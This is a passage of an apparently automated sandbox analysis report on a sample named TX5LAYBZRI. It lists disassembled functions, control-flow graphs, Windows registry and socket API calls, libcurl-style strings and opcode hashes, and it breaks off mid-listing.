                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: setsockopt
                                            • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                            • API String ID: 3981526788-2373386790
                                            • Opcode ID: 12751fa4aa42689726b0b8a64488da8234dbfe49304a68a9ec4efafafe852f3c
                                            • Instruction ID: 10de92ba9ed379acd5f579be5bd3372561e8f6890ffa499444a1d2646f7e1870
                                            • Opcode Fuzzy Hash: 12751fa4aa42689726b0b8a64488da8234dbfe49304a68a9ec4efafafe852f3c
                                            • Instruction Fuzzy Hash: 7662F471508345ABE7219F24C846FABB7E4FF81318F0449ADF98897292E771E845CB93
                                            Function 00C59740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 857 c59740-c5975b 858 c59780-c59782 857->858 859 c5975d-c59768 call c578a0 857->859 860 c59914-c5994e call f18b70 RegOpenKeyExA 858->860 861 c59788-c597a0 call f18e00 call c578a0 858->861 868 c5976e-c59770 859->868 869 c599bb-c599c0 859->869 872 c59950-c59955 860->872 873 c5995a-c59992 RegQueryValueExA RegCloseKey call f18b98 860->873 861->869 874 c597a6-c597c5 861->874 868->874 875 c59772-c5977e 868->875 870 c59a0c-c59a15 869->870 872->870 887 c59997-c599b5 call c578a0 873->887 880 c59827-c59833 874->880 881 c597c7-c597e0 874->881 875->861 883 c59835-c5985c call c4e2b0 * 2 880->883 884 c5985f-c59872 call c55ca0 880->884 885 c597f6-c59809 881->885 886 c597e2-c597f3 call f18b50 881->886 883->884 896 c599f0 884->896 897 c59878-c5987d call c577b0 884->897 885->880 899 c5980b-c59810 885->899 886->885 887->869 887->874 903 c599f5-c599fb call c55d00 896->903 904 c59882-c59889 897->904 899->880 900 c59812-c59822 899->900 900->870 912 c599fe-c59a09 903->912 904->903 908 c5988f-c5989b call c44fe0 904->908 908->896 916 c598a1-c598c3 call f18b50 call c578a0 908->916 912->870 921 c599c2-c599ed call c4e2b0 * 2 916->921 922 c598c9-c598db call c4e2d0 916->922 921->896 922->921 927 c598e1-c598f0 call c4e2d0 922->927 927->921 932 c598f6-c59905 call c563f0 927->932 937 c59f66-c59f7f call c55d00 932->937 938 c5990b-c5990f 932->938 937->912 940 c59a3f-c59a5a call c56740 call c563f0 938->940 940->937 946 c59a60-c59a6e call c56d60 940->946 949 c59a70-c59a94 call c56200 call c567e0 call c56320 946->949 950 c59a1f-c59a39 call c56840 call c563f0 946->950 961 c59a16-c59a19 949->961 962 c59a96-c59ac6 call c4d120 949->962 950->937 950->940 961->950 963 c59fc1 961->963 968 c59ae1-c59af7 call c4d190 962->968 969 c59ac8-c59adb call c4d120 962->969 965 c59fc5-c59ffd call c55d00 call c4e2b0 * 2 963->965 965->912 968->950 975 c59afd-c59b09 call c44fe0 968->975 969->950 969->968 975->963 981 c59b0f-c59b29 call c4e730 975->981 986 c59f84-c59f88 981->986 987 c59b2f-c59b3a call c578a0 981->987 989 c59f95-c59f99 986->989 987->986 994 c59b40-c59b54 call c4e760 987->994 991 c59fa0-c59fb6 call c4ebf0 * 2 989->991 992 c59f9b-c59f9e 989->992 1004 c59fb7-c59fbe 991->1004 992->963 992->991 1000 c59f8a-c59f92 994->1000 1001 c59b5a-c59b6e call c4e730 994->1001 1000->989 1008 c59b70-c5a004 1001->1008 1009 c59b8c-c59b97 call c563f0 1001->1009 1004->963 1013 c5a015-c5a01d 1008->1013 1016 c59b9d-c59bbf call c56740 call c563f0 1009->1016 1017 c59c9a-c59cab call c4ea00 1009->1017 1014 c5a024-c5a045 call c4ebf0 * 2 1013->1014 1015 c5a01f-c5a022 1013->1015 1014->965 1015->965 1015->1014 1016->1017 1035 c59bc5-c59bda call c56d60 1016->1035 1026 c59f31-c59f35 1017->1026 1027 c59cb1-c59ccd call c4ea00 call c4e960 1017->1027 1030 c59f37-c59f3a 1026->1030 1031 c59f40-c59f61 call c4ebf0 * 2 1026->1031 1043 c59cfd-c59d0e call c4e960 1027->1043 1044 c59ccf 1027->1044 1030->950 1030->1031 1031->950 1035->1017 1046 c59be0-c59bf4 call c56200 call c567e0 1035->1046 1054 c59d10 1043->1054 1055 c59d53-c59d55 1043->1055 1047 c59cd1-c59cec call c4e9f0 call c4e4a0 1044->1047 1046->1017 1063 c59bfa-c59c0b call c56320 1046->1063 1068 c59d47-c59d51 1047->1068 1069 c59cee-c59cfb call c4e9d0 1047->1069 1058 c59d12-c59d2d call c4e9f0 call c4e4a0 1054->1058 1061 c59e69-c59e8e call c4ea40 call c4e440 1055->1061 1086 c59d2f-c59d3c call c4e9d0 1058->1086 1087 c59d5a-c59d6f call c4e960 1058->1087 1082 c59e94-c59eaa call c4e3c0 1061->1082 1083 c59e90-c59e92 1061->1083 1078 c59b75-c59b86 call c4ea00 1063->1078 1079 c59c11-c59c1c call c57b70 1063->1079 1073 c59dca-c59ddb call c4e960 1068->1073 1069->1043 1069->1047 1091 c59ddd-c59ddf 1073->1091 1092 c59e2e-c59e36 1073->1092 1078->1009 1101 c59f2d 1078->1101 1079->1009 1104 c59c22-c59c33 call c4e960 1079->1104 1108 c59eb0-c59eb1 1082->1108 1109 c5a04a-c5a04c 1082->1109 1089 c59eb3-c59ec4 call c4e9c0 1083->1089 1086->1058 1111 c59d3e-c59d42 1086->1111 1114 c59d71-c59d73 1087->1114 1115 c59dc2 1087->1115 1089->950 1118 c59eca-c59ed0 1089->1118 1100 c59e06-c59e21 call c4e9f0 call c4e4a0 1091->1100 1097 c59e3d-c59e5b call c4ebf0 * 2 1092->1097 1098 c59e38-c59e3b 1092->1098 1106 c59e5e-c59e67 1097->1106 1098->1097 1098->1106 1141 c59de1-c59dee call c4ec80 1100->1141 1142 c59e23-c59e2c call c4eac0 1100->1142 1101->1026 1127 c59c35 1104->1127 1128 c59c66-c59c75 call c578a0 1104->1128 1106->1061 1106->1089 1108->1089 1121 c5a057-c5a070 call c4ebf0 * 2 1109->1121 1122 c5a04e-c5a051 1109->1122 1111->1061 1116 c59d9a-c59db5 call c4e9f0 call c4e4a0 1114->1116 1115->1073 1157 c59d75-c59d82 call c4ec80 1116->1157 1158 c59db7-c59dc0 call c4eac0 1116->1158 1125 c59ee5-c59ef2 call c4e9f0 1118->1125 1121->1004 1122->963 1122->1121 1125->950 1150 c59ef8-c59f0e call c4e440 1125->1150 1135 c59c37-c59c51 call c4e9f0 1127->1135 1146 c5a011 1128->1146 1147 c59c7b-c59c8f call c4e7c0 1128->1147 1135->1009 1167 c59c57-c59c64 call c4e9d0 1135->1167 1160 c59df1-c59e04 call c4e960 1141->1160 1142->1160 1146->1013 1147->1009 1170 c59c95-c5a00e 1147->1170 1165 c59f10-c59f26 call c4e3c0 1150->1165 1166 c59ed2-c59edf call c4e9e0 1150->1166 1174 c59d85-c59d98 call c4e960 1157->1174 1158->1174 1160->1092 1160->1100 1165->1166 1183 c59f28 1165->1183 1166->950 1166->1125 1167->1128 1167->1135 1170->1146 1174->1115 1174->1116 1183->963
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00C59946
                                            • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00C59974
                                            • RegCloseKey.KERNELBASE(?), ref: 00C5998B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                            • API String ID: 3677997916-4129964100
                                            • Opcode ID: c3b123de569c753ad7ce460f3828c871fb465676b19d7fa3ea5e32d4a2c0bdd8
                                            • Instruction ID: 5a435e64803ff2d78e0d3b1e70a55b87aa44d3a671b95cb8d5d98e740971aa58
                                            • Opcode Fuzzy Hash: c3b123de569c753ad7ce460f3828c871fb465676b19d7fa3ea5e32d4a2c0bdd8
                                            • Instruction Fuzzy Hash: 5832F5B9904201ABEB10AB21EC42A5B76E4FF54319F084874FD0997263F731EE58E797
                                            Function 00BC8B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1402 bc8b50-bc8b69 1403 bc8b6b-bc8b74 1402->1403 1404 bc8be6 1402->1404 1406 bc8beb-bc8bf2 1403->1406 1407 bc8b76-bc8b8d 1403->1407 1405 bc8be9 1404->1405 1405->1406 1408 bc8b8f-bc8ba7 call ba6e40 1407->1408 1409 bc8bf3-bc8bfe call bca550 1407->1409 1416 bc8bad-bc8baf 1408->1416 1417 bc8cd9-bc8d16 SleepEx 1408->1417 1414 bc8de4-bc8def 1409->1414 1415 bc8c04-bc8c08 1409->1415 1420 bc8e8c-bc8e95 1414->1420 1421 bc8df5-bc8e19 call bca150 1414->1421 1418 bc8dbd-bc8dc3 1415->1418 1419 bc8c0e-bc8c1d 1415->1419 1422 bc8bb5-bc8bb9 1416->1422 1423 bc8ca6-bc8cb0 1416->1423 1432 bc8d18-bc8d20 1417->1432 1433 bc8d22 1417->1433 1418->1405 1427 bc8c1f-bc8c30 connect 1419->1427 1428 bc8c35-bc8c48 call bca150 1419->1428 1425 bc8e97-bc8e9c 1420->1425 1426 bc8f00-bc8f06 1420->1426 1456 bc8e88 1421->1456 1457 bc8e1b-bc8e26 1421->1457 1422->1406 1431 bc8bbb-bc8bc2 1422->1431 1423->1417 1429 bc8cb2-bc8cb8 1423->1429 1434 bc8e9e-bc8eb6 call ba2a00 1425->1434 1435 bc8edf-bc8eef call b978b0 1425->1435 1426->1406 1427->1428 1462 bc8c4d-bc8c4f 1428->1462 1436 bc8ddc-bc8dde 1429->1436 1437 bc8cbe-bc8cd4 call bcb180 1429->1437 1431->1406 1439 bc8bc4-bc8bcc 1431->1439 1441 bc8d26-bc8d39 1432->1441 1433->1441 1434->1435 1461 bc8eb8-bc8edd call ba3410 * 2 1434->1461 1459 bc8ef2-bc8efc 1435->1459 1436->1405 1436->1414 1437->1414 1445 bc8bce-bc8bd2 1439->1445 1446 bc8bd4-bc8bda 1439->1446 1450 bc8d3b-bc8d3d 1441->1450 1451 bc8d43-bc8d61 call bad8c0 call bca150 1441->1451 1445->1406 1445->1446 1446->1406 1447 bc8bdc-bc8be1 1446->1447 1458 bc8dac-bc8db8 call bd50a0 1447->1458 1450->1436 1450->1451 1481 bc8d66-bc8d74 1451->1481 1456->1420 1465 bc8e2e-bc8e85 call bad090 call bd4fd0 1457->1465 1466 bc8e28-bc8e2c 1457->1466 1458->1406 1459->1426 1461->1459 1463 bc8c8e-bc8c93 1462->1463 1464 bc8c51-bc8c58 1462->1464 1473 bc8dc8-bc8dd9 call bcb100 1463->1473 1474 bc8c99-bc8c9f 1463->1474 1464->1463 1470 bc8c5a-bc8c62 1464->1470 1465->1456 1466->1456 1466->1465 1477 bc8c6a-bc8c70 1470->1477 1478 bc8c64-bc8c68 1470->1478 1473->1436 1474->1423 1477->1463 1483 bc8c72-bc8c8b call bd50a0 1477->1483 1478->1463 1478->1477 1481->1406 1486 bc8d7a-bc8d81 1481->1486 1483->1463 1486->1406 1490 bc8d87-bc8d8f 1486->1490 1493 bc8d9b-bc8da1 1490->1493 1494 bc8d91-bc8d95 1490->1494 1493->1406 1495 bc8da7 1493->1495 1494->1406 1494->1493 1495->1458
                                            APIs
                                            • connect.WS2_32(?,?,00000001), ref: 00BC8C30
                                            • SleepEx.KERNELBASE(00000000,00000000), ref: 00BC8CF3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: Sleepconnect
                                            • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                            • API String ID: 238548546-879669977
                                            • Opcode ID: 2284bba0f726183991c868fd349ca0768cf4b117213dd6cc333f4358f91184b3
                                            • Instruction ID: 7efe1fca8f9bc79d7f193f6c331bcaaca2d9138ee4f3d3048312bc256cfeb217
                                            • Opcode Fuzzy Hash: 2284bba0f726183991c868fd349ca0768cf4b117213dd6cc333f4358f91184b3
                                            • Instruction Fuzzy Hash: 02B1AD70604306AFDB10CF24C985FA6BBE0EF45314F1889ADE85A5B2D2DB71EC44C761
                                            Function 00B92F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1496 b92f17-b92f8c call 1061af0 call 1061ee0 1501 b931c9-b931cd 1496->1501 1502 b92f91-b92ff4 call b91619 RegOpenKeyExA 1501->1502 1503 b931d3-b931d6 1501->1503 1506 b92ffa-b9300b 1502->1506 1507 b931c5 1502->1507 1508 b9315c-b931ac RegEnumKeyExA 1506->1508 1507->1501 1509 b93010-b93083 call b91619 RegOpenKeyExA 1508->1509 1510 b931b2-b931c2 RegCloseKey 1508->1510 1513 b93089-b930d4 RegQueryValueExA 1509->1513 1514 b9314e-b93152 1509->1514 1510->1507 1515 b9313b-b9314b RegCloseKey 1513->1515 1516 b930d6-b93137 call 1061dc0 call 1061e50 call 1061ee0 call 1061cf0 call 1061ee0 call 1060250 1513->1516 1514->1508 1515->1514 1516->1515
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: CloseEnumOpen
                                            • String ID: d
                                            • API String ID: 1332880857-2564639436
                                            • Opcode ID: 9c34d9f920ea90696e5f61485dc50aebb68e0b21df2abbd6728a9492b7b528ea
                                            • Instruction ID: f431d27b2617b15d5fbe5da50b95b8cadbd7db97ccfe9669eac7b204f8bec128
                                            • Opcode Fuzzy Hash: 9c34d9f920ea90696e5f61485dc50aebb68e0b21df2abbd6728a9492b7b528ea
                                            • Instruction Fuzzy Hash: 757197B49053199FDB54DF69D58479EBBF0FF84308F1088ADE898A7310D7749A888F92
                                            Function 00BC9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1529 bc9290-bc92ed call b976a0 1532 bc93c3-bc93ce 1529->1532 1533 bc92f3-bc92fb 1529->1533 1542 bc93e5-bc9427 call bad090 call bd4f40 1532->1542 1543 bc93d0-bc93e1 1532->1543 1534 bc93aa-bc93af 1533->1534 1535 bc9301-bc9333 call bad8c0 call bad9a0 1533->1535 1536 bc93b5-bc93bc 1534->1536 1537 bc9456-bc9470 1534->1537 1554 bc9335-bc9364 WSAIoctl 1535->1554 1555 bc93a7 1535->1555 1540 bc93be 1536->1540 1541 bc9429-bc9431 1536->1541 1540->1537 1548 bc9439-bc943f 1541->1548 1549 bc9433-bc9437 1541->1549 1542->1537 1542->1541 1543->1536 1545 bc93e3 1543->1545 1545->1537 1548->1537 1552 bc9441-bc9453 call bd50a0 1548->1552 1549->1537 1549->1548 1552->1537 1558 bc939b-bc93a4 1554->1558 1559 bc9366-bc936f 1554->1559 1555->1534 1558->1555 1559->1558 1561 bc9371-bc9390 setsockopt 1559->1561 1561->1558 1562 bc9392-bc9395 1561->1562 1562->1558
                                            APIs
                                            • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00BC935C
                                            • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00BC9389
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: Ioctlsetsockopt
                                            • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                            • API String ID: 1903391676-2691795271
                                            • Opcode ID: 0c51c8efa6f496a91c296d2e9e9c1e29ec3c4575c6529b0f6e18a88335c64d6a
                                            • Instruction ID: de29441c6bfd03f53a3ccf1656d232ae2071a58db488bcce53cfe4f08a52c4d0
                                            • Opcode Fuzzy Hash: 0c51c8efa6f496a91c296d2e9e9c1e29ec3c4575c6529b0f6e18a88335c64d6a
                                            • Instruction Fuzzy Hash: 2551DC70600305ABEB25DF24C885FAAB7E5FF84314F1485ADFD588B292E730E991CB91
                                            Function 00B976A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1563 b976a0-b976be 1564 b976c0-b976c7 1563->1564 1565 b976e6-b976f2 send 1563->1565 1564->1565 1568 b976c9-b976d1 1564->1568 1566 b9775e-b97762 1565->1566 1567 b976f4-b97709 call b972a0 1565->1567 1567->1566 1570 b9770b-b97759 call b972a0 call b9cb20 call f18c50 1568->1570 1571 b976d3-b976e4 1568->1571 1570->1566 1571->1567
                                            APIs
                                            • send.WS2_32(multi.c,?,?,?,00B93D4E,00000000,?,?,00BA07BF), ref: 00B976EB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                            • API String ID: 2809346765-3388739168
                                            • Opcode ID: d38fb0c4c3d2a47cfd8f57671333eecf90c4520d2209f57f66db048376e9c5b0
                                            • Instruction ID: ded6722c8174c9617c39c917d13573deb716aa46bb3fc79bd6af512dfb573a92
                                            • Opcode Fuzzy Hash: d38fb0c4c3d2a47cfd8f57671333eecf90c4520d2209f57f66db048376e9c5b0
                                            • Instruction Fuzzy Hash: 03113DB1A69304BBD9209715EC8AE373BDDDBC3B68F450558B81813301EA659C01C7B1
                                            Function 00B97770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1682 b97770-b9778e 1683 b97790-b97797 1682->1683 1684 b977b6-b977c2 recv 1682->1684 1683->1684 1685 b97799-b977a1 1683->1685 1686 b9782e-b97832 1684->1686 1687 b977c4-b977d9 call b972a0 1684->1687 1688 b977db-b97829 call b972a0 call b9cb20 call f18c50 1685->1688 1689 b977a3-b977b4 1685->1689 1687->1686 1688->1686 1689->1687
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
